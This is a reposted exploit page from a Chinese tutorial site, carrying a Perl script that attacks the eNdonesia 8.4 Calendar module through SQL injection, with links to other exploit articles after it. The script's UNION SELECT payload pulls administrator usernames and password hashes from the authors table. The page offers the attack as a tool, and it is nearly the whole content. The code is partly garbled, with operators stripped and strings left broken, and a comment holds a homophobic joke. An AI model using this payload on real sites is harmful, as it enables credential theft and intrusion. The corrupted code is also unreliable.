手机
当前位置:查字典教程网 >电脑 >电脑安全教程 >eNdonesia 8.4 (Calendar Module) Remote SQL Injection Exploit
eNdonesia 8.4 (Calendar Module) Remote SQL Injection Exploit
摘要:#!/usr/bin/perl#/-----------------------------------------------#|/---...

#!/usr/bin/perl

#/-----------------------------------------------

#| /----------------------------------------- |

#| | Remote SQL Exploit | |

#| | eNdonesia 8.4 Remote SQL Exploit | |

#| | | |

#| | Calendar Module | |

#| -----------------------------------------/ |

#| /----------------------------------------- |

#| | Presented By Jack | |

#| | MainHack Enterprise | |

#| | & | |

#| | #MainHack #nob0dy #BaliemHackerlink | |

#| | Jack[at]MainHack[dot]com | |

#| -----------------------------------------/ |

#| /----------------------------------------- |

#| | Hello To: Indonesian h4x0r | |

#| | yadoy666,n0c0py & okedeh | |

#| | VOP Crew [Vaksin13,OoN_BoY,Paman] | |

#| | NoGe,str0ke,H312Y,s3t4n,[S]hiro,frull | |

#| | all MainHack BrotherHood | |

#| -----------------------------------------/ |

#-----------------------------------------------/

use HTTP::Request;

use LWP::UserAgent;

$sql_vulnerable = "/mod.php?mod=calendar&op=list_events

$sql_injection = "-999/**/union select/**/0x3a,0x3a,concat(aid,0x3a,pwd),0x3a,concat(name,0x3a,pwd)/**/from/**/authors/*where name pwd";

if(!@ARGV) { exit(1);}

sub help(){

print "n [?] eNdonesia 8.4 Remote SQL Exploitn";

print " [?] =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=n";

print " [?] Use : perl $0 n";

print " [?] Dont use ""n";

print " [?] =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=n";

print " [?] Baliem Hacker - VOP crew - MainHack BrotherHood nn";

print " [?] nn";

}

while (){

my $target = $ARGV[0];

my $exploit = "".$target.$sql_vulnerable.$sql_injection;

print "n [-] Trying to inject $target ...nn";

my $request = HTTP::Request-new(GET=$exploit);

my $useragent = LWP::UserAgent-

$useragent-timeout(10);

my $response = $useragent-request($request);

if ($response-is_success){

my $res = $response-

if ($res =~ m/([0-9,a-z]{2,13}):([0-9,a-f]{32})/g) {

my ($username,$passwd) = ($1,$2);

print " [target] $target n";

print " [loginx] $username:$passwd nn";

exit(0);

}

else {

die " [error] Fail to get username and password.nn";

}

}

else {

die " [error] Fail to inject $target nn";

}

}

#/----------------------------------------------------------------

#| NoGay kalo kita artikan sepintas berarti Tidak ada Gay |

#| namun mari kita perhatikan secara seksama ... |

#| NoGay merupakan kependekan dari NoGe is Gay. |

#| Sungguh, penyembunyian sebuah karakter di balik makna kata. |

#----------------------------------------------------------------/

#Vendor Has been contacted and now working for it.

【eNdonesia 8.4 (Calendar Module) Remote SQL Injection Exploit】相关文章:

MojoPersonals (mojoClassified.cgi mojo) Blind SQL Injection Exploit

历史悠久的3个经典网站安全漏洞介绍

BIND 9.x Remote DNS Cache Poisoning Flaw Exploit (c)

IntelliTamper 2.07/2.08 Beta 4 A HREF Remote Buffer Overflow Exploit

gapicms 9.0.2 (dirDepth) Remote File Inclusion Vulnerability

MojoJobs (mojoJobs.cgi mojo) Blind SQL Injection Exploit

利用火绒互联防止桌面快捷方式被篡改

QQ电脑管家怎么卸载

九种突破IDS入侵检测系统的实用方法

MojoAuto (mojoAuto.cgi mojo) Blind SQL Injection Exploit

精品推荐
分类导航